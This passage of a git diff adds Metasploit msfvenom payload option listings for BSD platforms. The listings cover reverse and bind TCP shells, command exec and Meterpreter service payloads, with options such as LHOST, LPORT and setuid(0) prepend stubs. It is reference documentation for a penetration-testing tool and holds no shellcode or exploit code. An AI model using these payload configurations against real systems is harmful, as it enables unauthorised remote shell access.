no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-vax-shell_reverse_tcp.txt b/msfvenom/payload_options/bsd-vax-shell_reverse_tcp.txt new file mode 100644 index 0000000..376380d --- /dev/null +++ b/msfvenom/payload_options/bsd-vax-shell_reverse_tcp.txt @@ -0,0 +1,38 @@ + + Name: BSD Command Shell, Reverse TCP Inline + Module: payload/bsd/vax/shell_reverse_tcp + Platform: BSD + Arch: vax +Needs Admin: No + Total size: 100 + Rank: Normal + +Provided by: + wvu + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-exec.txt b/msfvenom/payload_options/bsd-x64-exec.txt new file mode 100644 index 0000000..5f5629e --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-exec.txt @@ -0,0 +1,33 @@ + + Name: BSD x64 Execute Command + Module: payload/bsd/x64/exec + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 23 + Rank: Normal + +Provided by: + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute + +Description: + Execute an arbitrary command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/bsd-x64-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..4fe87e9 --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_bind_ipv6_tcp.txt @@ -0,0 +1,38 @@ + + Name: BSD x64 Command Shell, Bind TCP Inline (IPv6) + Module: payload/bsd/x64/shell_bind_ipv6_tcp + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 90 + Rank: Normal + +Provided by: + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_bind_tcp.txt b/msfvenom/payload_options/bsd-x64-shell_bind_tcp.txt new file mode 100644 index 0000000..663b523 --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_bind_tcp.txt @@ -0,0 +1,40 @@ + + Name: BSD x64 Shell Bind TCP + Module: payload/bsd/x64/shell_bind_tcp + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 136 + Rank: Normal + +Provided by: + nemo + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command string to execute +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Bind an arbitrary command to an arbitrary port + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_bind_tcp_small.txt b/msfvenom/payload_options/bsd-x64-shell_bind_tcp_small.txt new file mode 100644 index 0000000..9011ec3 --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_bind_tcp_small.txt @@ -0,0 +1,38 @@ + + Name: BSD x64 Command Shell, Bind TCP Inline + Module: payload/bsd/x64/shell_bind_tcp_small + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 88 + Rank: Normal + +Provided by: + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_reverse_ipv6_tcp.txt b/msfvenom/payload_options/bsd-x64-shell_reverse_ipv6_tcp.txt new file mode 100644 index 0000000..c197d9e --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_reverse_ipv6_tcp.txt @@ -0,0 +1,46 @@ + + Name: BSD x64 Command Shell, Reverse TCP Inline (IPv6) + Module: payload/bsd/x64/shell_reverse_ipv6_tcp + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + +Description: + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_reverse_tcp.txt b/msfvenom/payload_options/bsd-x64-shell_reverse_tcp.txt new file mode 100644 index 0000000..e47ce02 --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_reverse_tcp.txt @@ -0,0 +1,47 @@ + + Name: BSD x64 Shell Reverse TCP + Module: payload/bsd/x64/shell_reverse_tcp + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 98 + Rank: Normal + +Provided by: + nemo + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command string to execute +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_reverse_tcp_small.txt b/msfvenom/payload_options/bsd-x64-shell_reverse_tcp_small.txt new file mode 100644 index 0000000..7d52f88 --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_reverse_tcp_small.txt @@ -0,0 +1,45 @@ + + Name: BSD x64 Command Shell, Reverse TCP Inline + Module: payload/bsd/x64/shell_reverse_tcp_small + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 81 + Rank: Normal + +Provided by: + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-exec.txt b/msfvenom/payload_options/bsd-x86-exec.txt new file mode 100644 index 0000000..9db1361 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-exec.txt @@ -0,0 +1,35 @@ + + Name: BSD Execute Command + Module: payload/bsd/x86/exec + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 16 + Rank: Normal + +Provided by: + snagg + argp + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute + +Description: + Execute an arbitrary command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-metsvc_bind_tcp.txt b/msfvenom/payload_options/bsd-x86-metsvc_bind_tcp.txt new file mode 100644 index 0000000..676541d --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-metsvc_bind_tcp.txt @@ -0,0 +1,49 @@ + + Name: FreeBSD Meterpreter Service, Bind TCP + Module: payload/bsd/x86/metsvc_bind_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-metsvc_reverse_tcp.txt b/msfvenom/payload_options/bsd-x86-metsvc_reverse_tcp.txt new file mode 100644 index 0000000..b336f64 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-metsvc_reverse_tcp.txt @@ -0,0 +1,56 @@ + + Name: FreeBSD Meterpreter Service, Reverse TCP Inline + Module: payload/bsd/x86/metsvc_reverse_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell-bind_ipv6_tcp.txt b/msfvenom/payload_options/bsd-x86-shell-bind_ipv6_tcp.txt new file mode 100644 index 0000000..f7b6998 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell-bind_ipv6_tcp.txt @@ -0,0 +1,45 @@ + + Name: BSD Command Shell, Bind TCP Stager (IPv6) + Module: payload/bsd/x86/shell/bind_ipv6_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 63 + Rank: Normal + +Provided by: + skape + vlad902 + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Spawn a command shell (staged). + + Listen for a connection over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell-bind_tcp.txt b/msfvenom/payload_options/bsd-x86-shell-bind_tcp.txt new file mode 100644 index 0000000..29aed98 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell-bind_tcp.txt @@ -0,0 +1,43 @@ + + Name: BSD Command Shell, Bind TCP Stager + Module: payload/bsd/x86/shell/bind_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 54 + Rank: Normal + +Provided by: + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell-find_tag.txt b/msfvenom/payload_options/bsd-x86-shell-find_tag.txt new file mode 100644 index 0000000..870547b --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell-find_tag.txt @@ -0,0 +1,38 @@ + + Name: BSD Command Shell, Find Tag Stager + Module: payload/bsd/x86/shell/find_tag + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 40 + Rank: Normal + +Provided by: + skape + +Description: + Spawn a command shell (staged). + + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG qFGA yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell-reverse_ipv6_tcp.txt b/msfvenom/payload_options/bsd-x86-shell-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..3090e43 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell-reverse_ipv6_tcp.txt @@ -0,0 +1,53 @@ + + Name: BSD Command Shell, Reverse TCP Stager (IPv6) + Module: payload/bsd/x86/shell/reverse_ipv6_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 81 + Rank: Normal + +Provided by: + skape + vlad902 + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + +Description: + Spawn a command shell (staged). + + Connect back to the attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell-reverse_tcp.txt b/msfvenom/payload_options/bsd-x86-shell-reverse_tcp.txt new file mode 100644 index 0000000..7490412 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell-reverse_tcp.txt @@ -0,0 +1,50 @@ + + Name: BSD Command Shell, Reverse TCP Stager + Module: payload/bsd/x86/shell/reverse_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 43 + Rank: Normal + +Provided by: + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_bind_tcp.txt b/msfvenom/payload_options/bsd-x86-shell_bind_tcp.txt new file mode 100644 index 0000000..f27259c --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_bind_tcp.txt @@ -0,0 +1,38 @@ + + Name: BSD Command Shell, Bind TCP Inline + Module: payload/bsd/x86/shell_bind_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 73 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the 